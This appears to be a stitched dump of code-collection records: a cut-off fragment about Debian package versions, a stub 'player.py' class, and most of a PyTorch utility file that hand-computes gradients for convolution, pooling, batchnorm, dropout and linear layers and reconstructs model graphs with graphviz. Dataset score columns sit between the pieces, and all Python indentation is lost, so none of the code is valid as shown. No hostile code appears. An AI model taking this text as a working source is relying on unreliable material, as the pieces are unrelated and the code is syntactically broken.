version = versions[0] if len(versions) == 1 else None
prefix = 'Source: '
source_names = [l[len(prefix):] for l in lines if l.startswith(prefix)]
source_name = source_names[0] if len(source_names) == 1 else None
package_versions[debian_pkg_name] = PlatformPackageDescriptor(version, source_name)
return package_versions
| 2.015625 | 2 |
player.py | Drayux/Battlematus | 0 | 1189 | # PLAYER
class player:
def __init__(self):
| 1.695313 | 2 |
Framwork-Backpropagation/utils/utils_v2.py | ConvolutedDog/Implicit-Im2col-for-Backpropagation | 0 | 1190 | # Copyright 2022 ConvolutedDog (https://github.com/ConvolutedDog/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python3
import torch
import torch.nn as nn
import torch.nn.functional as F
from graphviz import Digraph, render
from torch.autograd import Variable
@torch.no_grad()
def cross_entropy_loss(y_predict, y_true):
print('\n=========================== Layer:'+' {0:18}'.format('cross_entropy_loss')+' Start ===========================')
print('# y_predict.shape: ', list(y_predict.shape))
print('# y_true.shape: ', list(y_true.shape))
y_shift = torch.sub(y_predict, torch.max(y_predict, dim=1, keepdim=True).values)
y_exp = torch.exp(y_shift)
y_probability = torch.div(y_exp, torch.sum(y_exp, dim=1, keepdim=True))
ypred_loss = torch.mean(-torch.sum(torch.mul(y_true, torch.log(y_probability)), dim=1, keepdim=True))
dLoss_dypred = y_probability - y_true
print('# dLoss_dypred.shape: ', list(dLoss_dypred.shape))
print('# Self calculated loss: ', ypred_loss.item())
print('=========================== Layer:'+' {0:18}'.format('cross_entropy_loss')+' End =============================')
return ypred_loss, dLoss_dypred
@torch.no_grad()
def fc_backward(dLoss_dnextz, z, w):
print('# next_dz.shape: ', list(dLoss_dnextz.shape))
print('# z.shape: ', list(z.shape))
print('# weight.shape: ', list(w.shape))
print('# bias.shape: ', '['+str(dLoss_dnextz.shape[1])+']')
N = z.shape[0]
if len(z.shape) == 4:
z = z.view(z.size(0), -1)
dLoss_dz = torch.matmul(dLoss_dnextz, w) #delta
dLoss_dfcW = torch.matmul(dLoss_dnextz.t(), z)
dLoss_dfcB = torch.sum(dLoss_dnextz, dim=0)
print('# dz.shape: ', list(dLoss_dz.shape))
print('# dweight.shape: ', list(dLoss_dfcW.shape))
print('# dbias.shape: ', list(dLoss_dfcB.shape))
return dLoss_dz, dLoss_dfcW/N, dLoss_dfcB/N
@torch.no_grad()
def view_backward(dLoss_dnextz, last_z, params):
print('# next_dz.shape: ', list(dLoss_dnextz.shape))
print('# last_z.shape: ', list(last_z.shape))
if params:
pooling = params[0]
stride = params[1]
padding = params[2]
output_size = (int((last_z.shape[2]-pooling[0]+2*padding[0])/stride[0]+1), \
int((last_z.shape[3]-pooling[0]+2*padding[0])/stride[0]+1))
dLoss_dz = dLoss_dnextz.reshape(last_z.shape[0], last_z.shape[1], output_size[0], output_size[1])
else:
dLoss_dz = dLoss_dnextz.reshape(last_z.shape)
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
def add_backward(dLoss_dnextz):
print('# next_dz.shape: ', list(dLoss_dnextz.shape))
dLoss_dz = dLoss_dnextz
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
@torch.no_grad()
def relu_backward(next_dz, z):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
zeros_tensor = torch.zeros_like(next_dz)
dLoss_dz = torch.where(torch.gt(z, 0), next_dz, zeros_tensor)
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
@torch.no_grad()
def dropback_backward(next_dz, mask, p):
print('# zeros probability: ', p)
print('# next_dz.shape: ', list(next_dz.shape))
print('# mask.shape: ', list(mask.shape))
zeros_tensor = torch.zeros_like(mask)
dLoss_dz = torch.mul(torch.where(torch.eq(mask, 1.), next_dz, zeros_tensor), 1./(1.-p))
print('# dz.shape: ', list(dLoss_dz.shape))
return dLoss_dz
@torch.no_grad()
def max_pooling_backward(next_dz, z, pooling, strides, padding=(0, 0)):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# padding: ', padding)
print('# strides: ', strides)
N, C, H, W = z.shape
_, _, out_h, out_w = next_dz.shape
padding_z = F.pad(z, pad=(padding[1],padding[1],padding[0],\
padding[0],0,0), mode='constant', value=0)
padding_dz = torch.zeros_like(padding_z)
for n in torch.arange(N):
for c in torch.arange(C):
for i in torch.arange(out_h):
for j in torch.arange(out_w):
flat_idx = torch.argmax(padding_z[n, c,
strides[0] * i:strides[0] * i + pooling[0],
strides[1] * j:strides[1] * j + pooling[1]])
h_idx = strides[0] * i + flat_idx // pooling[1]
w_idx = strides[1] * j + flat_idx % pooling[1]
padding_dz[n, c, h_idx, w_idx] += next_dz[n, c, i, j]
dz = _remove_padding(padding_dz, padding) # padding_z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]
print('# dz.shape: ', list(dz.shape))
return dz
@torch.no_grad()
def batchnorm2d_backward(next_dz, z, eps, gamma=torch.Tensor([1.,1.,1.])):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# eps: ', eps)
print('# gamma.shape: ', list(gamma.shape))
N, C, H, W = z.shape
m = N*H*W
shape = [N,C,H,W]
import numpy as np
ax = list(np.arange(len(shape)))
shape.pop(1)
ax.pop(1)
axis = tuple(ax)
dxhut = torch.zeros_like(next_dz)
for c in range(C):
dxhut[:,c] = next_dz[:,c]*gamma[c]
dz1 = m*dxhut
mu = z.mean(axis=axis, keepdim=True)
xmu = z - mu
xmu2 = xmu**2
var = xmu2.sum(axis=axis, keepdim=True)/m
ivar = 1./torch.pow(var+eps, 0.5)
dz2 = (ivar**2)*((dxhut*xmu).sum(axis=axis, keepdim=True))*xmu
dz3 = dxhut.sum(axis=axis, keepdim=True)
dz = ivar/m*(dz1-dz2-dz3)
print('# dz.shape: ', list(dz.shape))
return dz
@torch.no_grad()
def average_pooling_backward(next_dz, z, pooling, strides, padding=(0, 0)):
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# padding: ', padding)
print('# strides: ', strides)
N, C, H, W = z.shape
_, _, out_h, out_w = next_dz.shape
padding_z = F.pad(z, pad=(padding[1],padding[1],padding[0],\
padding[0],0,0), mode='constant', value=0)
padding_dz = torch.zeros_like(padding_z)
for n in torch.arange(N):
for c in torch.arange(C):
for i in torch.arange(out_h):
for j in torch.arange(out_w):
padding_dz[n, c,
strides[0] * i:strides[0] * i + pooling[0],
strides[1] * j:strides[1] * j + pooling[1]] += next_dz[n, c, i, j] / (pooling[0] * pooling[1])
dz = _remove_padding(padding_dz, padding) # padding_z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]
print('# dz.shape: ', list(dz.shape))
return dz
@torch.no_grad()
def _remove_padding(z, padding):
if padding[0] > 0 and padding[1] > 0:
return z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]
elif padding[0] > 0:
return z[:, :, padding[0]:-padding[0], :]
elif padding[1] > 0:
return z[:, :, :, padding[1]:-padding[1]]
else:
return z
@torch.no_grad()
def conv_backward(next_dz, K, z, padding=(0, 0), strides=(1, 1)):
N, C, H, W = z.shape
D, C, k1, k2 = K.shape
N, D, H1, W1 = next_dz.shape
print('# next_dz.shape: ', list(next_dz.shape))
print('# z.shape: ', list(z.shape))
print('# weight.shape: ', list(K.shape))
print('# bias.shape: ', '['+str(K.shape[0])+']')
print('# padding: ', padding)
print('# strides: ', strides)
padding_next_dz = _insert_zeros(next_dz, strides)
flip_K = torch.flip(K, (2, 3))
swap_flip_K = torch.swapaxes(flip_K, 0, 1)
ppadding_next_dz = F.pad(padding_next_dz, pad=(k2-1-padding[1],k2-1-padding[1],\
k1-1-padding[0],k1-1-padding[0],0,0), mode='constant', value=0)
dz = _conv_forward(ppadding_next_dz, swap_flip_K)
swap_z = torch.swapaxes(z, 0, 1)
dK = _conv_forward(torch.swapaxes(F.pad(z, pad=(padding[1],padding[1],\
padding[0],padding[0],0,0), mode='constant', value=0), 0, 1), torch.swapaxes(padding_next_dz, 0, 1))
db = torch.sum(torch.sum(torch.sum(next_dz, axis=-1), axis=-1), axis=0) # 在高度、宽度上相加;批量大小上相加
print('# dz.shape: ', list(dz.shape))
print('# dweight.shape: ', list(dK.transpose(0,1).shape))
print('# dbias.shape: ', list(db.shape))
return dz, (dK/N).transpose(0,1), db/N
@torch.no_grad()
def _conv_forward(x, weight, strides=(1,1)):
n, c, h_in, w_in = x.shape
d, c, k, j = weight.shape
x_pad = x
x_pad = x_pad.unfold(2, k, strides[0])
x_pad = x_pad.unfold(3, j, strides[1])
out = torch.einsum(
'nchwkj,dckj->ndhw',
x_pad, weight)
return out
@torch.no_grad()
def _insert_zeros(dz, strides):
N, D, H, W = dz.shape
H_last = (H-1)*(strides[0]-1) + H
W_last = (W-1)*(strides[1]-1) + W
pz = torch.zeros(N, D, H_last, W_last)
for n in range(N):
for d in range(D):
for h in range(0, H_last, strides[0]):
for w in range(0, W_last, strides[1]):
pz[n,d,h,w] = dz[n,d,h//strides[0],w//strides[1]]
return pz
@torch.no_grad()
def judge_tensors_equal(tensor_A, tensor_B):
if(not tensor_A.shape == tensor_B.shape):
print('Shape of two compard tensors is not equal.')
return None
error = 0
error_tolerance = 0.001
np_A = tensor_A.detach().numpy()
np_B = tensor_B.detach().numpy()
if len(tensor_A.shape) == 4:
N, C, H, W = tensor_A.shape
for n in range(N):
for c in range(C):
for h in range(H):
for w in range(W):
if np_A[n,c,h,w]-np_B[n,c,h,w] > error_tolerance or np_B[n,c,h,w]-np_A[n,c,h,w] > error_tolerance:
error += 1
if error%20 == 0:
pass
print('error', np_A[n,c,h,w], np_B[n,c,h,w])
else:
if n*c*h*w % 20000000000000 == 0:
pass
#print('right', np_A[n,c,h,w], np_B[n,c,h,w])
#print('Error rate: ', error/(N*C*H*W))
print('4D-error-rate: ', end=' ')
return error/(N*C*H*W)
elif len(tensor_A.shape) == 1:
C = tensor_A.shape[0]
for c in range(C):
if np_A[c]-np_B[c] > error_tolerance or np_B[c]-np_A[c] > error_tolerance:
#print(np_A[c], np_B[c])
error += 1
#print('Error rate: ', error/C)
print('1D-error-rate: ', end=' ')
return error/C
elif len(tensor_A.shape) == 2:
N, C = tensor_A.shape
for n in range(N):
for c in range(C):
if np_A[n,c]-np_B[n,c] > error_tolerance or np_B[n,c]-np_A[n,c] > error_tolerance:
#print(np_A[n,c], np_B[n,c])
error += 1
#print('Error rate: ', error/(C*N))
print('2D-error-rate: ', end=' ')
return error/(C*N)
@torch.no_grad()
def get_featuremap(featuremap_dir=None):
import os
featuremap = []
if featuremap_dir == None:
pth_dir = "./tmp_file/"
else:
pth_dir = featuremap_dir
files = os.listdir(pth_dir)
file_nums = []
for i in range(len(files)):
if '.pth' in files[i]:
file_nums.append(int(files[i].split('.pth')[0]))
file_nums.sort()
for file_num in file_nums:
tensor = torch.load(pth_dir+str(file_num)+'.pth')
featuremap.append(tensor)
delete_allpths(pth_dir=None)
return featuremap
@torch.no_grad()
def get_structure_parameters_v1(model):
layers = []
for layer in model.modules():
if not ':' in str(layer):
layers.append(layer)
parameters = []
fc_conv_weights = []
for layer in layers:
if isinstance(layer, nn.Conv2d):
layer_name = 'Conv2d'
Conv2d_params = {}
Conv2d_params['layer_name'] = layer_name
# in_channel
in_channel = layer.__dict__.get('in_channels')
Conv2d_params['in_channel'] = in_channel
# out_channel
out_channel = layer.__dict__.get('out_channels')
Conv2d_params['out_channel'] = out_channel
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
Conv2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
Conv2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
Conv2d_params['stride'] = (stride, stride)
else:
Conv2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
Conv2d_params['padding'] = (padding, padding)
else:
Conv2d_params['padding'] = padding
# return
fc_conv_weights.append(layer.weight)
parameters.append(Conv2d_params)
elif isinstance(layer, nn.ReLU):
layer_name = 'ReLU'
parameters.append({'layer_name': layer_name})
elif isinstance(layer, nn.MaxPool2d):
layer_name = 'MaxPool2d'
MaxPool2d_params = {}
MaxPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
MaxPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
MaxPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
MaxPool2d_params['stride'] = (stride, stride)
else:
MaxPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
MaxPool2d_params['padding'] = (padding, padding)
else:
MaxPool2d_params['padding'] = padding
# return
parameters.append(MaxPool2d_params)
elif isinstance(layer, nn.AvgPool2d):
layer_name = 'AvgPool2d'
AvgPool2d_params = {}
AvgPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
AvgPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
AvgPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
AvgPool2d_params['stride'] = (stride, stride)
else:
AvgPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
AvgPool2d_params['padding'] = (padding, padding)
else:
AvgPool2d_params['padding'] = padding
# return
parameters.append(AvgPool2d_params)
elif isinstance(layer, nn.Dropout):
layer_name = 'Dropout'
Dropout_params = {}
Dropout_params['layer_name'] = layer_name
# p
p = layer.__dict__.get('p')
Dropout_params['p'] = p
# return
parameters.append(Dropout_params)
elif isinstance(layer, nn.BatchNorm2d):
layer_name = 'BatchNorm2d'
BatchNorm2d_params = {}
BatchNorm2d_params['layer_name'] = layer_name
# num_features
num_features = layer.__dict__.get('num_features')
BatchNorm2d_params['num_features'] = num_features
# eps
eps = layer.__dict__.get('eps')
BatchNorm2d_params['eps'] = eps
# return
fc_conv_weights.append(layer.weight)
parameters.append(BatchNorm2d_params)
elif isinstance(layer, nn.Linear):
layer_name = 'Linear'
Linear_params = {}
Linear_params['layer_name'] = layer_name
# in_features
in_features = layer.__dict__.get('in_features')
Linear_params['in_features'] = in_features
# out_features
out_features = layer.__dict__.get('out_features')
Linear_params['out_features'] = out_features
# return
fc_conv_weights.append(layer.weight)
parameters.append(Linear_params)
elif isinstance(layer, nn.AdaptiveAvgPool2d):
layer_name = 'AdaptiveAvgPool2d'
AdaptiveAvgPool2d_params = {}
AdaptiveAvgPool2d_params['layer_name'] = layer_name
# output_size
output_size = layer.__dict__.get('output_size')
if not isinstance(output_size, tuple):
AdaptiveAvgPool2d_params['output_size'] = (output_size, output_size)
else:
AdaptiveAvgPool2d_params['output_size'] = output_size
# return
parameters.append(AdaptiveAvgPool2d_params)
else:
print('The layer has not been processed in get_structure_parameters_v1!')
return parameters, fc_conv_weights
@torch.no_grad()
def delete_allpths(pth_dir=None):
import os
if pth_dir == None:
pth_dir = "./tmp_file/"
for root, dirs, files in os.walk(pth_dir, topdown=False):
for name in files:
if name.endswith('.pth',):
os.remove(os.path.join(root, name))
@torch.no_grad()
def mul_items(tensor_size):
x = list(tensor_size)
mul = 1.
for i in range(len(x)):
mul *= x[i]
return mul
@torch.no_grad()
def gradient_backward_v1(model, img, label, num_class=1000):
return_dz = []
parameters, fc_conv_weights = get_structure_parameters_v1(model)
featuremap = get_featuremap(featuremap_dir=None)
featuremap.insert(0, img) ###
y_true = F.one_hot(label, num_classes=num_class).float()
loss, dLoss_dz = cross_entropy_loss(featuremap[-1], y_true)
print('Self calculated loss: ', loss)
featuremap.pop()
return_dz.append(dLoss_dz)
dW_dB_fc_conv = []
for i in range(len(parameters)-1, -1, -1):
layer = parameters[i]
print('\n======================== {0:3} Layer: '.format(str(i))+'{0:9}'.format(layer['layer_name'])+' Backward Start ========================')
if layer['layer_name'] == 'Conv2d':
z = featuremap[-1]
weight_z = fc_conv_weights[-1]
try:
padding = layer['padding']
except:
padding = (0, 0)
stride = layer['stride']
dLoss_dz, dLoss_dW, dLoss_dB = conv_backward(dLoss_dz, weight_z, z, padding, stride)
return_dz.append(dLoss_dz)
fc_conv_weights.pop()
if not len(featuremap) == 1:
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'ReLU':
z = featuremap[-1]
dLoss_dz = relu_backward(dLoss_dz, z)
return_dz.append(dLoss_dz)
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'MaxPool2d':
z = featuremap[-1]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = max_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz.append(dLoss_dz)
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'AvgPool2d':
z = featuremap[-1]
pooling = layer['kernel_size']
stride = layer['stride']
padding = layer['padding']
dLoss_dz = average_pooling_backward(dLoss_dz, z, pooling, stride, padding)
return_dz.append(dLoss_dz)
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'Linear':
weight_z = fc_conv_weights[-1]
z = featuremap[-1]
dLoss_dz, dLoss_dW, dLoss_dB = fc_backward(dLoss_dz, z, weight_z)
return_dz.append(dLoss_dz)
fc_conv_weights.pop()
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'Dropout':
p = layer['p']
mask = featuremap[-1]
dLoss_dz = dropback_backward(dLoss_dz, mask, p)
return_dz.append(dLoss_dz)
featuremap.pop()
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
elif layer['layer_name'] == 'BatchNorm2d':
eps = layer['eps']
z = featuremap[-1]
gamma = fc_conv_weights[-1]
dLoss_dz = batchnorm2d_backward(dLoss_dz, z, eps, gamma)
return_dz.append(dLoss_dz)
fc_conv_weights.pop()
lastpop = featuremap.pop()
if not len(dLoss_dz.shape) == len(lastpop.shape):
dLoss_dz = dLoss_dz.reshape(lastpop.shape)
else:
print('Not completed in gradient_backward_v1!')
print('======================== {0:3} Layer: '.format(str(i))+'{0:9}'.format(layer['layer_name'])+' Backward End ==========================')
delete_allpths(pth_dir=None)
return return_dz, dLoss_dW, dLoss_dB
@torch.no_grad()
def make_dot(var, params=None):
""" Produces Graphviz representation of PyTorch autograd graph
Blue nodes are the Variables that require grad, orange are Tensors
saved for backward in torch.autograd.Function
Args:
var: output Variable
params: dict of (name, Variable) to add names to node that
require grad (TODO: make optional)
"""
if params is not None:
assert isinstance(params.values()[0], Variable)
param_map = {id(v): k for k, v in params.items()}
node_attr = dict(style='filled',
shape='box',
align='left',
fontsize='12',
ranksep='0.1',
height='0.2')
dot = Digraph(node_attr=node_attr, graph_attr=dict(size="12,12"))
seen = set()
def size_to_str(size):
return '('+(', ').join(['%d' % v for v in size])+')'
def add_nodes(var):
if var not in seen:
if torch.is_tensor(var):
dot.node(str(id(var)), size_to_str(var.size()), fillcolor='orange')
elif hasattr(var, 'variable'):
u = var.variable
name = param_map[id(u)] if params is not None else ''
node_name = '%s\n %s' % (name, size_to_str(u.size()))
dot.node(str(id(var)), node_name, fillcolor='lightblue')
else:
dot.node(str(id(var)), str(type(var).__name__))
seen.add(var)
if hasattr(var, 'next_functions'):
for u in var.next_functions:
if u[0] is not None:
dot.edge(str(id(u[0])), str(id(var)))
add_nodes(u[0])
if hasattr(var, 'saved_tensors'):
for t in var.saved_tensors:
dot.edge(str(id(t)), str(id(var)))
add_nodes(t)
print(var)
add_nodes(var.grad_fn)
return dot
def generate_g(model, x):
delete_allpths(pth_dir=None)
print('\n=========================== Store network model Results Start =========================')
y = model(x)
print('=========================== Store network model Results End ===========================\n')
if 'GoogLeNet' in str(model).split('\n')[0]:
g = make_dot(y[0])
return g
else:
g = make_dot(y)
return g
@torch.no_grad()
def exchange_name(name):
if 'Relu' in name:
return 'ReLU'
elif 'AddmmBackward' in name:
return 'Linear'
elif 'ViewBackward' in name:
return 'View'
elif 'Mean' in name or 'Avg' in name:
return 'AvgPool2d'
elif 'BatchNorm' in name:
return 'BatchNorm2d'
elif 'Conv' in name:
return 'Conv2d'
elif 'MaxPool' in name:
return 'MaxPool2d'
elif 'MulBackward' in name:
return 'Dropout_2'
elif 'DivBackward' in name:
return 'Dropout_1'
elif 'AddBackward' in name:
return 'Add'
elif 'Cat' in name:
return 'Cat'
elif 'Hardtanh' in name:
return 'ReLU6'
else:
return 'None'
@torch.no_grad()
def generate_connections(g):
graph = str(g).split('\n')
labels = {}
connections = []
for i in range(len(graph)):
if 'label' in graph[i] and graph[i][-1] == '"':
labels[(graph[i]+graph[i+1][1:]).split('\t')[1].split(' ')[0]]=\
(graph[i]+graph[i+1][1:]).split('\t')[1].split('"')[1]
if 'label' in graph[i] and graph[i][-1] == ']':
labels[graph[i].split('\t')[1].split(' ')[0]]=\
graph[i].split('\t')[1].split('=')[1].split(']')[0]
for i in range(len(graph)):
if '->' in graph[i]:
connections.append({labels[graph[i].split('\t')[1].split(' -> ')[0]]+'_'+\
graph[i].split('\t')[1].split(' -> ')[0]:\
labels[graph[i].split('\t')[1].split(' -> ')[1]]+'_'+\
graph[i].split('\t')[1].split(' -> ')[1]})
pop_index = []
for i in range(len(connections)):
item_key = list(connections[i].keys())[0]
if '(' in item_key or 'TBackward' in item_key:
pop_index.append(connections[i])
for i in range(len(pop_index)-1, -1, -1):
connections.remove(pop_index[i])
new_connections = []
for item in connections:
key, value = list(item.items())[0]
key1 = exchange_name(key.split('_')[0]) + '_' + key.split('_')[1]
value1 = exchange_name(value.split('_')[0]) + '_' + value.split('_')[1]
if 'None' in key1 or 'None' in value1:
print('Not completed for '+key+' or '+value+'! Check exchange_name function!')
exit()
new_connections.append({key1: value1})
if not len(new_connections) == len(connections):
print('Generate connections not done! Check generate_connections function!')
exit()
new_connections.insert(0, {list(new_connections[0].values())[0]: None})
new_connections.append({'None': 'None'})
return connections, new_connections
@torch.no_grad()
def get_split_connections(connections):
return_connections = []
tmp_split = []
for i in range(len(connections)):
item = connections[i]
if len(tmp_split) == 0:
tmp_split.append(item)
continue
value = list(item.values())[0]
last_key = list(tmp_split[-1].keys())[0]
if value == last_key:
tmp_split.append(item)
else:
return_connections.append(tmp_split)
tmp_split = [item]
return return_connections
@torch.no_grad()
def find_start_end(list_dic_key_value, i, j):
key1 = list(list_dic_key_value[i].values())[0]
key2 = list(list_dic_key_value[j].keys())[0]
start = 0
end = len(list_dic_key_value)-1
for index in range(len(list_dic_key_value)):
if key1 == list(list_dic_key_value[index].keys())[0]:
start = index
break
for index in range(len(list_dic_key_value)):
if key2 == list(list_dic_key_value[index].keys())[0]:
end = index
break
return start+1, end-1
@torch.no_grad()
def merge_connections(connections):
import copy
last_connections = copy.deepcopy(connections)
connections.append({'None':'None'})
num_Throwed = 0
notchoosed = []
print('\n=========================== Restore network model Start ===============================')
for i in range(len(connections)):
print('# Restore network model: processing {}/{}'.format(i, len(connections)-1))
item_key = list(connections[i].keys())[0]
if not 'None' in item_key:
if i == 0:
pass
else:
last_item_key = list(connections[i-1].keys())[0]
if not connections[i][item_key] == last_item_key:
for j in range(i+1, len(connections)):
if not list(connections[j].values())[0] == list(connections[j-1].keys())[0]:
notchoosed.append(i)
start, end = find_start_end(connections, i, j-1)
tmp = []
tmp.append(connections[start:end+1])
tmp.append(connections[i:j-1])
last_connections[start:end+1] = [tmp]
for kk in range(end-start):
last_connections.insert(start, 'Throwed')
num_Throwed += 1
break
if not notchoosed == []:
last_connections = last_connections[:notchoosed[0]]
else:
pass
for i in range(num_Throwed):
last_connections.remove('Throwed')
if last_connections[-1] == {'None': 'None'}:
last_connections.remove({'None': 'None'})
print('=========================== Restore network model End =================================\n')
return last_connections
@torch.no_grad()
def find_next_layer_by_name(layers, name, start_i):
for i in range(start_i, len(layers)):
layer = layers[i]
if name in str(layer):
return layer, i
@torch.no_grad()
def get_layers(last_connections, model):
return_layers = []
tmp_layers = []
for layer in model.modules():
if not ':' in str(layer):
tmp_layers.append(layer)
index_tmp_layers = 0
for i in range(len(last_connections)-1, -1, -1):
if not isinstance(last_connections[i], list):
# 单一层,无分支
current_layer_name = list(last_connections[i].keys())[0].split('_')[0]
if 'ReLU' in current_layer_name:
return_layers.insert(0, torch.nn.ReLU(inplace=True))
elif 'Add' in current_layer_name:
return_layers.insert(0, 'Add')
elif 'View' in current_layer_name:
return_layers.insert(0, 'View')
else:
tmp = find_next_layer_by_name(tmp_layers, current_layer_name, index_tmp_layers)
return_layers.insert(0, tmp[0])
if isinstance(last_connections[i-1], list):
index_tmp_layers = tmp[1] + 1
elif not list(last_connections[i-1].keys())[0].split('_')[0] == 'Dropout':
index_tmp_layers = tmp[1] + 1
else:
return_layers.insert(0, [])
for j in range(len(last_connections[i])):
return_layers[0].append([])
if len(last_connections[i][j]) == 0:
continue
for k in range(len(last_connections[i][j])-1, -1, -1):
current_layer_name = list(last_connections[i][j][k].keys())[0].split('_')[0]
if 'ReLU' in current_layer_name:
return_layers[0][j].insert(0, torch.nn.ReLU(inplace=True))
elif 'Add' in current_layer_name:
return_layers[0][j].insert(0, 'Add')
elif 'View' in current_layer_name:
return_layers.insert(0, 'View')
else:
tmp = find_next_layer_by_name(tmp_layers, current_layer_name, index_tmp_layers)
return_layers[0][j].insert(0, tmp[0])
if not list(last_connections[i][j][k-1].keys())[0].split('_')[0] == 'Dropout':
index_tmp_layers = tmp[1] + 1
return return_layers
@torch.no_grad()
def get_tensors(last_connections):
tensors = get_featuremap(featuremap_dir=None)
index_tensors = 0
import copy
last_tensors = copy.deepcopy(last_connections)
for i in range(len(last_connections)-1, -1, -1):
if not isinstance(last_connections[i], list):
current_layer_name = list(last_connections[i].keys())[0].split('_')[0]
if 'Add' in current_layer_name:
last_tensors[i] = 'Add'
elif 'View' in current_layer_name:
last_tensors[i] = 'View'
else:
last_tensors[i] = tensors[index_tensors]
index_tensors += 1
else:
for j in range(len(last_connections[i])):
if len(last_connections[i][j]) == 0:
continue
for k in range(len(last_connections[i][j])-1, -1, -1):
current_layer_name = list(last_connections[i][j][k].keys())[0].split('_')[0]
if 'Add' in current_layer_name:
last_tensors[i][j][k] = 'Add'
elif 'View' in current_layer_name:
last_tensors[i][j][k] = 'View'
else:
last_tensors[i][j][k] = tensors[index_tensors]
index_tensors += 1
for i in range(len(last_tensors)-1, -1, -1):
if isinstance(last_tensors[i], str):
# Add or View
if last_tensors[i] == 'Add':
last_tensors[i] = last_tensors[i+1][0][0] + last_tensors[i+1][1][0]
if last_tensors[i] == 'View':
last_tensors[i] = last_tensors[i+1].view(last_tensors[i+1].size(0), -1)
elif isinstance(last_tensors[i], list):
for j in range(len(last_tensors[i])):
if len(last_tensors[i][j]) == 0:
last_tensors[i][j].append(last_tensors[i+1])
return last_tensors
@torch.no_grad()
def get_structure_parameters(return_layers):
import copy
parameters = copy.deepcopy(return_layers)
fc_conv_weights = copy.deepcopy(return_layers)
for i in range(len(return_layers)):
layer = return_layers[i]
if isinstance(layer, nn.Conv2d):
layer_name = 'Conv2d'
Conv2d_params = {}
Conv2d_params['layer_name'] = layer_name
# in_channel
in_channel = layer.__dict__.get('in_channels')
Conv2d_params['in_channel'] = in_channel
# out_channel
out_channel = layer.__dict__.get('out_channels')
Conv2d_params['out_channel'] = out_channel
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
Conv2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
Conv2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
Conv2d_params['stride'] = (stride, stride)
else:
Conv2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
if not isinstance(padding, tuple):
Conv2d_params['padding'] = (padding, padding)
else:
Conv2d_params['padding'] = padding
# return
fc_conv_weights[i] = layer.weight
parameters[i] = Conv2d_params
elif isinstance(layer, nn.ReLU):
layer_name = 'ReLU'
parameters[i] = {'layer_name': layer_name}
elif layer == 'Add':
layer_name = 'Add'
parameters[i] = {'layer_name': layer_name}
elif layer == 'View':
layer_name = 'View'
parameters[i] = {'layer_name': layer_name}
elif layer == 'Cat':
layer_name = 'Cat'
parameters[i] = {'layer_name': layer_name}
elif isinstance(layer, nn.MaxPool2d):
layer_name = 'MaxPool2d'
MaxPool2d_params = {}
MaxPool2d_params['layer_name'] = layer_name
# kernel_size
kernel_size = layer.__dict__.get('kernel_size')
if not isinstance(kernel_size, tuple):
MaxPool2d_params['kernel_size'] = (kernel_size, kernel_size)
else:
MaxPool2d_params['kernel_size'] = kernel_size
# stride
stride = layer.__dict__.get('stride')
if not isinstance(stride, tuple):
MaxPool2d_params['stride'] = (stride, stride)
else:
MaxPool2d_params['stride'] = stride
# padding
padding = layer.__dict__.get('padding')
